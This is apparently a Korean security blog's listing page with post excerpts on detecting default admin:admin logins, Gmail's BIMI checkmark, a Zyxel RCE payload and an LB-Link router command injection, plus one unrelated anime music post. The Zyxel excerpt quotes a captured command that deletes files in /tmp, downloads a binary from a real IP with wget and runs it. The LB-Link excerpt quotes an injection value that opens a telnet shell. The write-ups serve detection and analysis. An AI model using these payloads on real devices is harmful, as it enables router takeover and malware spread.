전체 글

문자열로 유추하기 쉬운 관리자 계정 및 패스워드를 통한 로그인 시도 탐지 Authorization: Basic YWRtaW46YWRtaW4 Base64 디코딩 echo -n 'YWRtaW46YWRtaW4=' | base64 --decode Base64 인코딩 echo -n 'admin:admin' | base64

구글이 Gmail 사용자들의 안전한 메일 사용을 위해 파란색 체크 표시☑를 붙여 읽어도 안전한 메일과 그렇지 않은 메일을 구분할 수 있게 한다 파란색 체크 표시는 구글의 BIMI(Brand Indicators for Message Identification) 기능을 사용하여 사용자에게 로고가 실제로 자신의 소유임을 알리도록 되어 있는지 인증한다 체크표시 위로 마우스를 가져가면 해당 메일의 발신자가 "이메일을 보내는데 사용하는 도메인과 프로필 이미지를 소유하고 있음을 확인했다"고 표시된다 그런데 사용자는 이 기능을 무조건 신뢰해도 되는걸까? 파란색 체크 표시는 악의적인 공격자가 악용하는 방법을 개발할 때까지만 유효하며 사용자들은 이 파란 체크 표시를 믿고 의지하다가 더 많은 공격을 받게 될 수도 있다 예를..

자이젤 제품의 RCE(Remote Code Execution) 취약점 모뎀, 네트워크 스위치, 라우터 등의 네트워크 엑세스 포인트 제품 대만 회사 해당 취약점은 Zyxel 제품에 영향을 미치며 원격 공격자가 임의 코드를 실행할 수 있도록 한다 /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*; ${IFS}wget{IFS}http://103.95.196.149/mips;${IFS}chmod ${IFS}777{IFS}mips;${IFS}./mips${IFS}zyxel.selfrep; 참고 Our selection of alerts on honeypots: report 5 – march 2023 - TEHTRIS A good understanding of ac..

LB_Link는 무선 네트워킹 제품(무선 라우터, 네트워크 어뎁터)를 만드는 회사로 무선 라우터 BL-AC1900, BL-WR9000, BL-X26, BL-LTE300에 커멘드 인젝션 취약점이 존재한다 커멘드 인젝션 취약점이란? 취약한 애플리케이션을 통해 호스트의 OS에서 시스템의 명령을 실행하는 공격이다 안전하지 않은 사용자 데이터(쿠키, 양식, HTTP 헤더)를 전달할 때 공격이 가능하다 LB-Link 라우터 커멘드 인젝션(CVE-2023-26801) mac 매개변수의 입력 유효성 검사가 불충분하여 취약점이 발생할 수 있다 명령 삽입 시도 값인 mac=;telnet -1 /bin/sh; 가 mac 매개변수에 추가된다 I 옵션과 함께 telnetd 명령을 실행하여 새 로그인 셸(/bin/sh)를 시도하..

몇 년만에 생각나서 들었다가 소름 돋았다 소아온 매드무비 중에서 최고의 갓작 1년 2개월 20일은 이 매드무비를 위해 만들어진 노래같음 노래 모든 멜로디와 가사 하나하나가 진짜 추억이다 진짜 좋아했고 지금도 너무 좋아하는 노래와 소아온